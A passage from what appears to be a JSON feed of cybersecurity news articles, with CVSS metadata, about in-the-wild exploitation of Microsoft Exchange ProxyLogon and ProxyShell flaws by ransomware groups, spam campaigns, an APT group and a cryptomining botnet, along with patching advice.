access.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) a [nmap plugin](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgG4LpJKxqUO2-qxnPcHk7kZshWlpcUJf4apWnuuu8g9A2r0wcvybcwpf7lOoNA63j4bRBhFvjSOcGs6VNIFsmjXTIplZEkjAFtBn3cM6NGJ0rIS2GGGAKNgL2WQIm_-fjXlryklUzygBckkBMBoeHlXhheLR9onLzGHVYPSgJnrJE7GbCsqTLo57hD/s728-e100/hive-ransomware.jpg>)\n\nA recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher, Nadav Ovadia, [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. \n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral movement.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbU5YaGjiHhZvFPL5Fqh7rHbVldX6X-unk-Mq6dP0icasfzkogYQnkRDy9ZUNWr3oca2oh6FGdjSzMm5uyXe1DLzwsty4H8hXGZia0azIu3Q24ZyBwemMQXMvu5dpzZQn-9MUl_WWAG5opQBaoXlyg6Esg2eBVWtdYcBrz5l7yZPDtCD1v9nzKF-D8/s728-e100/hive.jpg>)\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of characters to evade detection, Ovadia said. Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEihM5iYK8V59Az6V_QU4QfgIeRF_0hGVdMPzkolUAVIW-fNuFPicRQP8GVCKVzA_FETzCTUZXWBI67kH6LRZTLGCO5eI9UumwAso17F_kIigeX8Y7Z41AMwAPgq1iysoZkTTX-VU5eO4nCRvjFq57tq6FcnFZd3DBb3A8kWOZ253GJWm-fH0WFE7Fna>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of \"**ProxyShell**\" Microsoft Exchange vulnerabilities that were patched earlier this May, including deploying LockFile ransomware on compromised systems.\n\nTracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls, elevate privileges on the Exchange PowerShell backend, effectively permitting the attacker to perform unauthenticated, remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates.\n\n\"An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>).\n\nThe development comes a little over a week after cybersecurity researchers sounded the alarm on [opportunistic scanning and exploitation](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) of unpatched Exchange servers by taking advantage of the ProxyShell attack chain.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi9pcvxkZCqcBcriArdPtNn0AWuIafJEeUPlEHsu4z-oKwZf3gzsprTbCyyBAmMBzU-gFoDqTD8zWP4vrlEdDv_w5I3I5iSFyAS8RZ2p_jjRO0sOXbKoN31TMsPPfb0BXXZt8m7aM2SAtTFrkZ3hdSN1FSLaynBoGiYDkl78s_i0T5Kva4eudH21Jzf>) \n--- \nImage Source: [Huntress Labs](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) \n \nOriginally demonstrated at the [Pwn2Own hacking contest](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) in April this year, ProxyShell is part of a broader trio of exploit chains discovered by DEVCORE security researcher Orange Tsai that includes ProxyLogon and ProxyOracle, the latter of which concerns two remote code execution flaws that could be employed to recover a user's password in plaintext format.\n\n\"They're backdooring boxes with webshells that drop other webshells and also executables that periodically call out,\" researcher Kevin Beaumont [noted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) last week.\n\nNow according to researchers from Huntress Labs, at least [five distinct styles of web shells](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) have been observed as deployed to vulnerable Microsoft Exchange servers, with over over 100 incidents reported related to the exploit between August 17 and 18. Web shells grant the attackers remote access to the compromised servers, but it isn't clear exactly what the goals are or the extent to which all the flaws were used.\n\nMore than 140 web shells have been detected across no fewer than 1,900 unpatched Exchanger servers to date, Huntress Labs CEO Kyle Hanslovan [tweeted](<https://twitter.com/KyleHanslovan/status/1428804893423382532>), adding \"impacted [organizations] thus far include building manufacturing, seafood processors, industrial machinery, auto repair shops, a small residential airport and more.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-22T09:51:00", "type": "thn", "title": "WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:28:25", "id": "THN:5BE77895D84D1FB816C73BB1661CE8EB", "href": "https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjiGzDP_Q8TgakrIFP6H8c0NlSHHH4ztdEtesv8G-AaS-LvfiauO6JgcrFpPKfplpRuqYssvepWzyhQaLMIPqPzyt00vE0kNEL3qEg1k1YRQpWZouKa_km8jD-kuKbNBXugV_MhYndYW41kM6o2z77T4oOGQlDGhGk-HA0tZfdol-RO_fCE6o7N54uW>)\n\nThreat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems.\n\nThe findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a never-before-seen loader dubbed SQUIRRELWAFFLE. First publicly [documented](<https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html>) by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via laced Microsoft Office documents.\n\n\"It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities,\" researchers Mohamed Fahmy, Sherif Magdy, Abdelrhman Sharshar [said](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) in a report published last week. \"To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits.\"\n\n[ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>) refer to a collection of flaws in Microsoft Exchange Servers that could enable a threat actor to elevate privileges and remotely execute arbitrary code, effectively granting the ability to take control of the vulnerable machines. While the ProxyLogon flaws were addressed in March, the ProxyShell bugs were patched in a series of updates released in May and July.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhYwBTFRq5MuslNIXJAtZNZ-q9Ik0Wyu_z6HVG8loZsBaeJR_tXRLvm18OZvIJYeeOyYp0DVHZdMg8sdqe9H3ePEot8dMGuNuC25YWuyp09kuYsm_qh2nU_3dlFK7X2kVXn-DYmtklqChAj_2BOpas4TFiWcbPR3PtoX5RKukcpGn0sd1S8Ubdqo1bu>) \n--- \nDLL infection flow \n \nTrend Micro said it observed the use of public exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell) on three of the Exchange servers that were compromised in different intrusions, using the access to hijack legitimate email threads and send malicious spam messages as replies, thereby increasing the likelihood that unsuspecting recipients will open the emails.\n\n\"Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail getaways will not be able to filter or quarantine any of these internal emails,\" the researchers said, adding the attackers behind the operation did not carry out lateral movement or install additional malware so as to stay under the radar and avoid triggering any alerts.\n\nThe attack chain involves rogue email messages containing a link that, when clicked, drops a Microsoft Excel or Word file. Opening the document, in turn, prompts the recipient to enable macros, ultimately leading to the download and execution of the SQUIRRELWAFFLE malware loader, which acts as a medium to fetch final-stage payloads such as Cobalt Strike and Qbot.\n\nThe development marks a new escalation in phishing campaigns where a threat actor has breached corporate Microsoft Exchange email servers to gain unauthorized access to their internal mail systems and distribute malicious emails in an attempt to infect users with malware.\n\n\"SQUIRRELWAFFLE campaigns should make users wary of the different tactics used to mask malicious emails and files,\" the researchers concluded. \"Emails that come from trusted contacts may not be enough of an indicator that whatever link or file included in the email is safe.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T11:47:00", "type": "thn", "title": "Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-23T07:33:36", "id": "THN:0D80EEB03C07D557AA62E071C7A7C619", "href": "https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiQk7skJEo49QfN4ESusan9jBZfTXapDKpnR6CXuJbaNKUBpx7nO684Vj5RRctI8hh09KwyntDYPyeQI-HbWC03E5Uo4ABDXXj3vfb774Dv1G65e03iX30VM0pcCe5hQfxnkW-u1V4gZgZ3L2et_QXqceUwFJfPQDg8aUOWSagSt-l0OGRquNTiLEso>)\n\nA previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks.\n\nCybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang \u2014 referring to their chameleellonic capabilities, including disguising \"its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.\" \n\n\"To achieve their goal, the attackers used a trending penetration method\u2014supply chain,\" the researchers [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-uncovers-new-apt-group-attacking-russia-s-fuel-and-energy-complex-and-aviation-production-industry/>) of one of the incidents investigated by the firm. \"The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. Using this method [\u2026], the ChamelGang group was able to achieve its goal and steal data from the compromised network.\"\n\nIntrusions mounted by the adversary are believed to have commenced at the end of March 2021, with later attacks in August leveraging what's called the [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) chain of vulnerabilities affecting Microsoft Exchange Servers, the technical details of which were first revealed at the Black Hat USA 2021 security conference earlier that month.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgpU90FEVyvHUv6m3vUITmIj4tJ_Kexp6cw5No4dV8_Po339DpYJtWa0Z-_BTv7hBE9_EkkSjRVlbP2lsM6MxD-x1p1yD_mQOhRoeiBy9vjPZXWBKrrJlJlvEbl4QdL8woMTd4XIY2ZGusd5N0uFaCwXBUiwFnJnXGfU0C-ESawdO8FR9OB4njoQ6oc>)\n\nThe attack in March is also notable for the fact that the operators breached a subsidiary organization to gain access to an unnamed energy company's network by exploiting a flaw in Red Hat JBoss Enterprise Application ([CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>)) to remotely execute commands on the host and deploy malicious payloads that enable the actor to launch the malware with elevated privileges, laterally pivot across the network, and perform reconnaissance, before deploying a backdoor called DoorMe.\n\n\"The infected hosts were controlled by the attackers using the public utility FRP (fast reverse proxy), written in Golang,\" the researchers said. \"This utility allows connecting to a reverse proxy server. The attackers' requests were routed using the socks5 plugin through the server address obtained from the configuration data.\"\n\nOn the other hand, the August attack against a Russian company in the aviation production sector involved the exploitation of ProxyShell flaws (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to drop additional web shells and conduct remote reconnaissance on the compromised node, ultimately leading to the installation of a modified version of the DoorMe implant that comes with expanded capabilities to run arbitrary commands and carry out file operations.\n\n\"Targeting the fuel and energy complex and aviation industry in Russia isn't unique \u2014 this sector is one of the three most frequently attacked,\" Positive Technologies' Head of Threat Analysis, Denis Kuvshinov, said. \"However, the consequences are serious: Most often such attacks lead to financial or data loss\u2014in 84% of all cases last year, the attacks were specifically created to steal data, and that causes major financial and reputational damage.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-04T12:48:00", "type": "thn", "title": "A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-04T12:48:16", "id": "THN:E95B6A75073DA71CEC73B2E4F0B13622", "href": "https://thehackernews.com/2021/10/a-new-apt-hacking-group-targeting-fuel.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/---oICK3YQu8/YIJ50RG8cxI/AAAAAAAACWY/KkCLoHke1SsfzdcENBXnq3d4jAZlau0ggCLcBGAsYHQ/s0/malware.jpg>)\n\nAttackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research.\n\n\"Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more,\" Boston-based cybersecurity firm Cybereason [said](<https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities>) in an analysis summarizing its findings.\n\nFirst documented by Cisco Talos in July 2020, [Prometei](<https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html>) is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and \"increase the amount of systems participating in its Monero-mining pool.\"\n\n\"Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted infected machines when spreading across the network,\" Cybereason senior threat researcher Lior Rochberger said, adding it's \"built to interact with four different command-and-control (C2) servers which strengthens the botnet's infrastructure and maintains continuous communications, making it more resistant to takedowns.\"\n\nThe intrusions take advantage of the recently patched vulnerabilities in [Microsoft Exchange Servers](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) with the goal of abusing the processing power of the Windows systems to mine Monero.\n\nIn the attack sequence observed by the firm, the adversary was found exploiting Exchange server flaws CVE-2021-27065 and CVE-2021-26858 as an initial compromise vector to install the China Chopper web shell and gain backdoor ingress to the network. With this access in place, the threat actor launched PowerShell to download the initial Prometei payload from a remote server. \n\n[](<https://thehackernews.com/images/-QPt-u63tvwA/YIJ6AaW7GPI/AAAAAAAACWg/z8_YGp_eggY-c6gUKoOyrf5D3cZtnDdzwCLcBGAsYHQ/s0/malware.jpg>)\n\nRecent versions of the bot module come with backdoor capabilities that support an extensive set of commands, including an additional module called \"Microsoft Exchange Defender\" that masquerades as a legitimate Microsoft product, which likely takes care of removing other competing web shells that may be installed on the machine so that Prometei gets access to the resources necessary to mine cryptocurrency efficiently.\n\nInterestingly, newly unearthed evidence gathered from [VirusTotal](<https://www.virustotal.com/gui/file/cf542ada135ee3edcbbe7b31003192c75295c7eff0efe7593a0a0b0f792d5256/details>) [artifacts](<https://www.virustotal.com/gui/file/fdcf4887a2ace73b87d1d906b23862c0510f4719a6c159d1cde48075a987a52f/details>) has revealed that the botnet may have been around as early as May 2016, implying that the malware has constantly been evolving ever since, adding new modules and techniques to its capabilities.\n\nPrometei has been observed in a multitude of victims spanning across finance, insurance, retail, manufacturing, utilities, travel, and construction sectors, compromising networks of entities located in the U.S., U.K., and several countries in Europe, South America, and East Asia, while also explicitly avoiding infecting targets in former [Soviet bloc](<https://en.wikipedia.org/wiki/Eastern_Bloc>) countries.\n\nNot much is known about the attackers other than the fact that they are Russian speaking, with older versions of Prometei having their language code set as \"Russian.\" A separate Tor client module used to communicate with a Tor C2 server included a configuration file that's configured to avoid using several exit nodes located in Russia, Ukraine, Belarus, and Kazakhstan.\n\n\"Threat actors in the cybercrime community continue to adopt APT-like techniques and improve efficiency of their operations,\" Rochberger said. \"As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft Exchange vulnerabilities and exploited them in order to penetrate targeted networks.\"\n\n\"This threat poses a great risk for organizations, since the attackers have absolute control over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\" she added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-23T07:42:00", "type": "thn", "title": "Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T15:00:17", "id": "THN:F2A3695D04A2484E069AC407E754A9C1", "href": "https://thehackernews.com/2021/04/prometei-botnet-exploiting-unpatched.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-04T12:04:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6538WifO-pQPlUhACBuUX_jTbrSpW305DDSQv2XtGhWolinz3L4Hgy3yckiql7NJG9L9tFcb9ZFIPr1a1yBf9bvlyuXOAhhxdrgegxaIMeSIxRzX7JFkUbAULNHo8UzppH76EuY77JOotsyc1FYph-TCqk5DAr4GPj--2TvKuoLT8Tucw6ssJeCOa/s728-e100/proxynotshell.jpg>)\n\nNicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.\n\nBased on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 \u2013 to permit a remote actor to execute arbitrary code.\n\nDespite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of 